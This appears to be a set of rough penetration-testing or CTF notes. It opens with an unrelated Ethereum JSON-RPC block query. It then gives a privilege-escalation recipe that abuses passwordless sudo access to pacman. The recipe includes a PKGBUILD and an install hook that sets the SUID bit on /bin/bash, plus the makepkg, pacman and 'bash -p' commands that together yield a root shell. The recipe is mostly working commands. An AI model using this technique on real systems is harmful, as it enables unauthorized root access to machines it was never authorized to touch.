{
"jsonrpc": "2.0",
"method": "eth_getBlockByNumber",
"params": [
"0x1",
true
],
"id": 1
}
paul to root we can use pacman as root without password
we can edit post_install function in .install and make pacman run malicious script
PKGBUILD:
pkgname=exploit
pkgver=1.0
pkgrel=1
arch=('any')
install=exploit.install
exploit.install:
post_install(){ chmod +s /bin/bash; }
then run makepkg -s sudo pacman -U *.tar –noconfirm bash -p